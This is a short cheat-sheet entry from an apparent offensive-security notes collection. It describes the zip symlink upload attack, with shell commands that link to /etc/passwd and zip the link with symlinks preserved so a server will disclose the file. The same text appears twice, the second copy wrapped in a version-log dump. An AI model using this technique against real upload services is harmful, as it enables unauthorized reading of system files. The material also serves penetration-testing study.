killchain-compendium/Exploits/Compression/Zip Symlink.md

# Zip Symlink

https://effortlesssecurity.in/zip-symlink-vulnerability/

The exploit is a method of using LFI through an uploaded symlink compressed inside a zip file.
Create a symlink and put it in a zip file.

```sh
ln -s /etc/passwd link.name
```

compress it leaving symlinks intact

```sh
zip -r --symlinks mal.zip link.name
```
bump 2023-08-28 19:45:37 +02:00			`# Zip Symlink`

			`https://effortlesssecurity.in/zip-symlink-vulnerability/`

			`The exploit is a method of using LFI through an uploaded symlink compressed inside a zip file.`
			`Create a symlink and put it in a zip file.`

			```sh
			`ln -s /etc/passwd link.name`
			```

			`compress it leaving symlinks intact`

			```sh
			`zip -r --symlinks mal.zip link.name`
			```